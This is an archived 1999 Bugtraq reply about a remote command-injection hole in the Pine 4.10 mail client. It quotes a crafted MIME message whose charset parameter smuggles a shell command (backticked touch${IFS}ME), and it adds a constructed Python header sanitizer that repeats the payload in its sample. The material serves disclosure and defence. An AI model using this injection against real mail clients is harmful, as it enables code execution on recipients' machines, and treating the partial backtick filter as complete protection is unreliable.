[9420] in bugtraq
Re: remote exploit on pine 4.10 - neverending story?
daemon@ATHENA.MIT.EDU (John D. Hardin)
Tue Feb 9 11:51:12 1999
Date: Mon, 8 Feb 1999 09:25:11 -0800
Reply-To: "John D. Hardin" <jhardin@WOLFENET.COM>
From: "John D. Hardin" <jhardin@WOLFENET.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.4.05.9902072346030.924-100000@nimue.ids.pl>

On Mon, 8 Feb 1999, Michal Zalewski wrote:
> Hmm, but take a look at this message:
>
> ************************** MIME MESSAGE FOLLOWS **************************
> From: Attacker <attacker@eleet.net>
> To: Victim <victim@somewhere.net>
> Subject: Happy birthday
> ...
> MIME-Version: 1.0
> Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
>
> --8323328-235065145-918425607=:319
> Content-Type: TEXT/PLAIN; charset='US-ASCII'
>
> Make a wish...
>
> --8323328-235065145-918425607=:319
> Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
> Content-Transfer-Encoding: BASE64
> Content-Description: wish
> Content-Disposition: attachment; filename="wish.c"
>
> ...it could be your last.
> *************************** MIME MESSAGE ENDS ***************************

Okay, I have added `` -> " conversion to my procmail MIME sanitizer.
Michal, is that the only way to exploit this? Or should there be ` ->
' conversion as well?

See http://www.wolfenet.com/~jhardin/procmail-security.html for
details.

--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
Your mouse has moved. Windows NT must be restarted for the change
to take effect. Reboot now? [ OK ]
-----------------------------------------------------------------------
101 days until Star Wars episode I
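
Added example, not part of the original post and not the code of the procmail sanitizer it mentions: a Python filter that applies the `` -> " conversion to the Content-Type and Content-Disposition fields of every MIME part, including folded continuation lines, and also applies the ` -> ' conversion that the post only asks about (an assumption here). The function name and the sample message, modeled on the quoted one, are constructed for illustration.

```python
# Header fields whose parameters a mail client may pass on to a shell.
MIME_FIELDS = ("content-type", "content-disposition")

def sanitize_mime_headers(message):
    """Return (sanitized_message, findings) for a raw mail message.

    findings lists (line_number, stripped_line) for each header line changed.
    Bodies are left alone; only header blocks (top level and per part) change.
    """
    out, findings = [], []
    in_headers, in_field = True, False
    for lineno, line in enumerate(message.split("\n"), start=1):
        if line.strip() == "":
            in_headers = in_field = False       # blank line ends a header block
        elif line.startswith("--"):
            in_headers, in_field = True, False  # boundary: part headers follow
        elif in_headers:
            if line[0] not in " \t":            # new field, not a folded line
                name = line.split(":", 1)[0].strip().lower()
                in_field = name in MIME_FIELDS
            if in_field and "`" in line:
                findings.append((lineno, line.strip()))
                # `` -> " is the conversion the post says was added;
                # ` -> ' is the one it only asks about (assumption).
                line = line.replace("``", '"').replace("`", "'")
        out.append(line)
    return "\n".join(out), findings

# Constructed sample: the charset parameter sits on a folded header line.
SAMPLE = "\n".join([
    "From: Attacker <attacker@eleet.net>",
    "MIME-Version: 1.0",
    'Content-Type: MULTIPART/MIXED; BOUNDARY="b1"',
    "",
    "--b1",
    "Content-Type: TEXT/PLAIN; charset=US-ASCII",
    "",
    "Make a `wish`...",
    "",
    "--b1",
    "Content-Type: TEXT/PLAIN;",
    ' charset=``touch${IFS}ME``; name="logexec.c"',
    "",
    "...it could be your last.",
    "--b1--",
])

if __name__ == "__main__":
    clean, hits = sanitize_mime_headers(SAMPLE)
    print(clean)
    print(hits)
```

A body line that begins with "--" (a signature separator, for instance) is treated as the start of a header block until the next blank line, so the filter errs toward rewriting rather than skipping.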